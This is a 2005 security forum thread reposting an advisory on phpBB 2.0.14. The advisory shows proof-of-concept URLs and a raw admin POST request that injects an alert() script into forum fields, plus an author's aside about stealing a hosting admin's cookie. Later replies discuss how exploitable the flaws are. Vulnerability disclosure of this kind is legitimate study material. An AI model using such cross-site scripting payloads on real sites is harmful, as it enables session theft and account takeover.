Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 224 Members: 0 Total: 224 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpBB -> -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN View previous topic :: View next topic -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN Posted: Sun Apr 24, 2005 2:10 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman Code: * -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05 -------------------------------------------------------- Program: phpBB 2.0.14 Homepage: http://www.phpbb.com Vulnerable Versions: phpBB 2.0.14 & Lower versions Risk: Low Risk!! Impact: Multiple Vulnerabilities. -==phpBB 2.0.14 Multiple Vulnerabilities==- --------------------------------------------------------- - Description --------------------------------------------------------- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. - Tested --------------------------------------------------------- localhost & many forums - Explotation --------------------------------------------------------- -==Bad Filter of HTML Code==- phpBB2/profile.php?mode=viewprofile&u=\[]phpBB2/viewtopic.php?p=3&highlight=\[]######################################################### -==XSS==- POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1 forumname=&lt;script&gt;alert('NST')&lt;/script&gt;&forumdesc=&lt;script&gt;alert('NST')&lt;/script&gt;&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm... - References -------------------------------------------------------- http://neosecurityteam.net/Advisories/Advisory-14.txt - Credits ------------------------------------------------- Discovered by HaCkZaTaN <hck_zatan hotmail com> [N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/ Got Questions? http://neosecurityteam.net/ Irc.gigachat.net #uruguay [NeoSecurity IRC] - Greets -------------------------------------------------------- Paisterist Daemon21 LINUX erg0t uyx CrashCool Makoki KingMetal r3v3ng4ns And my Colombian people @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */ http://neosecurityteam.net/ Posted: Wed Apr 27, 2005 7:06 pm KingOfSka Advanced user Joined: Mar 13, 2005 Posts: 61 can't understand how to make it work lol i get a blank profile every time i try.. Posted: Thu Apr 28, 2005 7:49 pm gulftech Valuable expert Joined: Apr 20, 2005 Posts: 9 1) Putting any non integer based value that doesn't return a record will result in the blank profile. 2) The regex issue in highlight is more of a bug than a security issue. I could be wrong, but I have glanced at the code an don't see it as exploitable. It is a bug though and should be fixed I guess. 3) I have never heard of cross site scripting when using the post method, but I could see how POST cross site scripting could be exploited. For example, you could have an auto submitted form using javascript, but in this example a valid session id is required so it is not exploitable. Posted: Sat May 21, 2005 12:30 pm Twinky Regular user Joined: May 20, 2005 Posts: 5 how do i use this can sum1 plz explain Last edited by Twinky on Sat May 21, 2005 10:40 pm; edited 1 time in total Posted: Sat May 21, 2005 9:58 pm g30rg3_x Active user Joined: Jan 23, 2005 Posts: 31 Location: OutSide Of The PE i'm just going to repeat that hackzatan my team-mate on NsT say to king of ska: HaCkZaTaN wrote: Is just if u have admin rights nothing much Peace!!!!!!!! http://neosecurityteam.net/viewtopic.php?t=225 -==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN www.waraxe.us Forum Index -> PhpBB You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.197 Seconds